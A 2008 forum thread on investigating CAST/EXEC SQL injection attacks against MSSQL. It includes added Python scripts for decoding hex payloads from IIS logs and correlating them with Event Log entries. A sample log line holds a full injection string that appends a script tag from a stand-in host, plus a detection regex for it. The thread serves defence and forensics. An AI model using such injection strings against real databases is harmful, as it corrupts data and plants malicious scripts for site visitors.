Recent SQL injection attacks

(@secret_squirrel)
Posts: 38
Eminent Member
Topic starter
 

Hi all,

There have been a slew of SQL injection attacks since about Jan 08.

I have worked a few of them.

The attacker uses a 'cast' option to declare a variable and then exec it. The result of this attack is that a database has now been riddled with <script src=> tags.

In my experience, this attack has always left an easy-to-follow trail (IIS logs).

I am currently looking at an incident where there are numerous declare/cast entries throughout the logs. The problem is, after exporting the cs-uri-query entries to a CSV, removing duplicates and decoding them, I have NOT found a matching entry for the script src tags that were appended to the database fields.

The only thing I can think is that there is another web app somewhere using this DB. Of course, no documentation at all.

Anyway, to my question: what can I do on an MSSQL server to log activity to a particular database (as verbose as possible)?

Or any other advice?

 
Posted : 14/10/2008 6:52 am
(@bithead)
Posts: 1206
Noble Member
 

Some tomes I have been following

Microsoft Security Advisory (954462)
Rise in SQL Injection Attacks Exploiting Unverified User Data Input

Advanced SQL Injection

Recent SQL Injection Attacks against Server

MSSQL and Security (Check out the Audit section)

 
Posted : 14/10/2008 8:10 am
ecophobia
(@ecophobia)
Posts: 127
Estimable Member
 

I recently came across a few hex-based SQL injection attacks, most of them automated (bots). Unfortunately there are still a lot of easy targets for these attacks; even Firefox plugins such as SQL Injection 1.2 or HackBar are often successful. If you look at the weekly download statistics for these plugins...

 
Posted : 14/10/2008 4:26 pm
(@mkel2000)
Posts: 24
Eminent Member
 

> Hi all,
>
> Anyway, to my question: what can I do on an MSSQL server to log activity to a particular database (as verbose as possible)?
>
> Or any other advice?

The first thing you might want to look for is any Event Log entries related to that activity. While they won't log the computer the activity came from, they will give you some external data on the activity itself.

Now, to answer your question, there is a type of SQL logging available called "C2 logging." C2 is a government security rating that certifies a system has secured its resources and has sufficient auditing capabilities. It is turned on by the DBA using the SQL command line tool, osql.exe. Once C2 is enabled, all types of database access are logged into a trace file. In my experience, though, you may or may not find anything in these logs, depending on the nature of the exploit. I know for a fact that many Metasploit SQL exploits will leave no trace in these or any other logs.

I'm not a DBA, so you may want to see if you can find one locally to help you if you want to set up C2 logging. However, I do have the commands needed so you can PM me if you need additional information.

Mark

 
Posted : 21/10/2008 6:19 am
keydet89
(@keydet89)
Posts: 3568
Famed Member
 

Mark,

> The first thing you might want to look for is any Event Log entries related to that activity. While it won't log the computer they came from, they will give you some external data on the activity itself.

What are the event IDs and sources that one should look for, and in which Event Log?

 
Posted : 21/10/2008 7:33 am
(@arbert)
Posts: 14
Active Member
 

> Hi all,
>
> There have been a slew of SQL injection attacks since about Jan 08.
>
> I have worked a few of them.
>
> The attacker uses a 'cast' option to declare a variable and then exec it. The result of this attack is that a database has now been riddled with <script src=> tags.
>
> In my experience, this attack has always left an easy-to-follow trail (IIS logs).
>
> I am currently looking at an incident where there are numerous declare/cast entries throughout the logs. The problem is, after exporting the cs-uri-query entries to a CSV, removing duplicates and decoding them, I have NOT found a matching entry for the script src tags that were appended to the database fields.
>
> The only thing I can think is that there is another web app somewhere using this DB. Of course, no documentation at all.
>
> Anyway, to my question: what can I do on an MSSQL server to log activity to a particular database (as verbose as possible)?
>
> Or any other advice?

Run SQL Profiler and filter the text data for any statements that have CAST or CONVERT. You might also look at a quick and dirty application firewall that will filter this stuff to start with (Microsoft released an update to URLScan that will do this). It's really clever how some of these have been working. They pass a binary string to SQL Server, cast it back to character text and then EXEC it. On the bright side, most have been pretty benign; at least you can easily remove their script, as opposed to them changing data beyond repair (restore).

 
Posted : 21/10/2008 7:39 am
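The decoding step the topic starter describes (export cs-uri-query, de-duplicate, decode, look for the injected script src) and the mechanism arbert describes (a hex literal CAST back to text and EXECed) can be automated against the IIS W3C logs. The script below is an added example written for this thread; it is not code from any of the posters. It assumes a W3C extended log with a #Fields directive, that NVARCHAR/NCHAR hex literals are UTF-16LE while VARCHAR/CHAR literals use the server code page (cp1252 is assumed here), and it builds its own constructed sample log lines (hostname example.invalid, RFC 5737 client addresses) so it runs offline. It decodes every CAST(0x... AS ...) literal it finds and lets you search the decoded text for the tag that showed up in the database fields; an empty result for that search is exactly the "no matching entry, another app must be writing to this DB" situation described above.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample data (not from the thread). The hex literals are generated
# below from plain text so the sample is self-consistent and obviously synthetic.
PAYLOAD_TEXT = ("UPDATE Products SET Description = Description + "
                "'<script src=http://example.invalid/x.js></script>'")
PAYLOAD_HEX = PAYLOAD_TEXT.encode("utf-16-le").hex().upper()   # NVARCHAR literal
PROBE_TEXT = "select 1 as probe"
PROBE_HEX = PROBE_TEXT.encode("cp1252").hex()                   # VARCHAR literal

SAMPLE_LOG = f"""#Software: Microsoft Internet Information Services 6.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2008-10-13 03:12:44 10.0.0.5 GET /products.asp id=1;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x{PAYLOAD_HEX}%20AS%20NVARCHAR(4000));EXEC(@S);-- 80 - 192.0.2.10 200
2008-10-13 03:12:45 10.0.0.5 GET /products.asp id=2 80 - 198.51.100.7 200
2008-10-13 03:13:01 10.0.0.5 GET /search.asp q=dEcLaRe+%40t+varchar%28255%29%3Bset+%40t%3Dcast%280x{PROBE_HEX}+as+varchar%28255%29%29%3Bexec%28%40t%29-- 80 - 192.0.2.10 500
"""

# Matches CAST(0x<hex> AS NVARCHAR|VARCHAR|NCHAR|CHAR ...) in URL-decoded query text.
CAST_RE = re.compile(r"CAST\s*\(\s*0x([0-9A-Fa-f]+)\s+AS\s+(N?(?:VAR)?CHAR)", re.IGNORECASE)


def parse_iis_log(text: str) -> list[dict]:
    """Parse W3C extended format lines into dicts keyed by the #Fields names."""
    fields: list[str] = []
    records: list[dict] = []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):          # other directives (#Software, #Date, ...)
            continue
        values = line.split(" ")
        if len(values) != len(fields):    # malformed line: skip rather than misalign columns
            continue
        records.append(dict(zip(fields, values)))
    return records


def decode_hex_payload(hex_digits: str, declared_type: str) -> str:
    """Decode a 0x... literal the way SQL Server reads it for the declared type.

    NVARCHAR/NCHAR literals are UTF-16LE; VARCHAR/CHAR literals are single-byte
    in the server code page (cp1252 assumed here). An odd-length literal, e.g. a
    log field truncated mid-payload, is trimmed to whole bytes so partial
    payloads still decode instead of raising.
    """
    if len(hex_digits) % 2:
        hex_digits = hex_digits[:-1]
    raw = bytes.fromhex(hex_digits)
    if declared_type.upper().startswith("N"):
        if len(raw) % 2:
            raw = raw[:-1]
        return raw.decode("utf-16-le", errors="replace")
    return raw.decode("cp1252", errors="replace")


def find_cast_injections(records: list[dict]) -> list[dict]:
    """Return one hit per CAST(0x...) literal found in any request's cs-uri-query."""
    hits = []
    for rec in records:
        query = unquote_plus(rec.get("cs-uri-query", "-"))
        for m in CAST_RE.finditer(query):
            hits.append({
                "when": f"{rec['date']} {rec['time']}",
                "c_ip": rec.get("c-ip", "-"),
                "uri_stem": rec.get("cs-uri-stem", "-"),
                "declared_type": m.group(2).upper(),
                "decoded": decode_hex_payload(m.group(1), m.group(2)),
            })
    return hits


def find_payloads_mentioning(hits: list[dict], needle: str) -> list[dict]:
    """Filter decoded payloads for a string seen in the tampered DB fields."""
    return [h for h in hits if needle.lower() in h["decoded"].lower()]


if __name__ == "__main__":
    hits = find_cast_injections(parse_iis_log(SAMPLE_LOG))
    for h in hits:
        print(h["when"], h["c_ip"], h["uri_stem"], h["declared_type"], repr(h["decoded"][:80]))
    print("payloads mentioning 'script src':", len(find_payloads_mentioning(hits, "script src")))
```

Point the parser at the real log files and search the decoded payloads for the exact src value that was appended to the database; if the declared type is VARCHAR on a server whose code page is not cp1252, change the fallback codec to match the server.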
(@mkel2000)
Posts: 24
Eminent Member
 

> Mark,
>
> What are the event IDs and sources that one should look for, and in which Event Log?

Whether or not you have any Event log entries is dependent upon the audit level set in the SQL Server properties. These events will be generated in the Windows Application Event Log. Default logging of normal user logins is not enabled, but failed and successful logins for the SQL Admin account is. You can set logging for all failed and successful logins in the settings for the SQL Server.

The information I have in front of me is that the Event ID for SQL logins is 17055. However, you might want to filter on all events with a Source of MSSQLSERVER. As I said earlier, this will not tell you where the connection came from, but it could help isolate the activity's date and time when looking through other logs like firewall or IIS logs. Those logs might then identify your source or give you a place to start looking.

Mark

 
Posted : 22/10/2008 10:26 pm
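Mark's suggestion is to use the Application Event Log entries (Source MSSQLSERVER, Event ID 17055 for logins) only as timestamps, and then look at the firewall or IIS logs around those times. The script below is an added example for this thread, not code from any of the posters. It assumes the Event Log has been exported as rows of (local time, Source, Event ID, message) and the IIS requests as (time, client IP, URI), and it builds constructed sample rows for both. The one caveat it handles is the clock mismatch a practitioner runs into: the Windows Event Viewer shows local time while IIS W3C logs are written in UTC by default, so the event times are shifted by the server's UTC offset before the time-window join; with the wrong offset the correlation silently finds nothing.

```python
from datetime import datetime, timedelta

# Constructed sample data (not from the thread). Event Log rows use local time,
# as Event Viewer displays them; IIS rows use UTC, as W3C logs record them.
EVENTS = [
    ("2008-10-13 05:12:44", "MSSQLSERVER", 17055, "Login succeeded for user 'webapp'."),
    ("2008-10-13 05:20:00", "Print", 10, "unrelated event"),
    ("2008-10-13 06:40:02", "MSSQLSERVER", 17055, "Login failed for user 'sa'."),
]
IIS_REQUESTS = [
    ("2008-10-13 03:12:43", "192.0.2.10", "/products.asp?id=1;DECLARE%20@S..."),
    ("2008-10-13 03:12:45", "198.51.100.7", "/products.asp?id=2"),
    ("2008-10-13 04:40:01", "203.0.113.9", "/login.asp"),
    ("2008-10-13 09:00:00", "198.51.100.7", "/index.asp"),
]


def parse_ts(text: str) -> datetime:
    """Parse the 'YYYY-MM-DD HH:MM:SS' form used by both sample exports."""
    return datetime.strptime(text, "%Y-%m-%d %H:%M:%S")


def correlate(events, requests, event_utc_offset_hours, window_seconds=5,
              source="MSSQLSERVER", event_id=None):
    """For each matching Event Log row, list IIS requests within +/- window_seconds.

    event_utc_offset_hours is the server's local offset from UTC at the time of
    the events (e.g. 2 for UTC+2); it is subtracted so both sides compare in UTC.
    """
    window = timedelta(seconds=window_seconds)
    offset = timedelta(hours=event_utc_offset_hours)
    results = []
    for when_local, src, eid, message in events:
        if src != source or (event_id is not None and eid != event_id):
            continue
        when_utc = parse_ts(when_local) - offset
        nearby = [(ts, ip, uri) for ts, ip, uri in requests
                  if abs(parse_ts(ts) - when_utc) <= window]
        results.append({"event_utc": when_utc, "event_id": eid,
                        "message": message, "requests": nearby})
    return results


def client_ips_near_events(results) -> set:
    """Distinct client addresses seen in any event's window, a starting point for the IIS/firewall review."""
    return {ip for r in results for _, ip, _ in r["requests"]}


if __name__ == "__main__":
    for r in correlate(EVENTS, IIS_REQUESTS, event_utc_offset_hours=2, event_id=17055):
        print(r["event_utc"], r["event_id"], r["message"])
        for ts, ip, uri in r["requests"]:
            print("   ", ts, ip, uri)
```

Widen window_seconds if the web tier and the database run on separate hosts whose clocks drift, and verify the offset by picking one event you can independently tie to a request before trusting the rest of the matches.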
(@arbert)
Posts: 14
Active Member
 

> Mark,
>
> What are the event IDs and sources that one should look for, and in which Event Log?
>
> Whether or not you have any Event log entries is dependent upon the audit level set in the SQL Server properties. These events will be generated in the Windows Application Event Log. Default logging of normal user logins is not enabled, but failed and successful logins for the SQL Admin account is. You can set logging for all failed and successful logins in the settings for the SQL Server.
>
> The information I have in front of me is that the Event ID for SQL logins is 17055. However, you might want to filter on all events with a Source of MSSQLSERVER. As I said earlier, this will not tell you where the connection came from, but it could help isolate the activity's date and time when looking through other logs like firewall or IIS logs. Those logs might then identify your source or give you a place to start looking.
>
> Mark

Right, but if it's a web application, failed logins aren't going to do you a lot of good (unless you have your SQL Server open to the world and someone is actually hitting that directly).

 
Posted : 22/10/2008 10:36 pm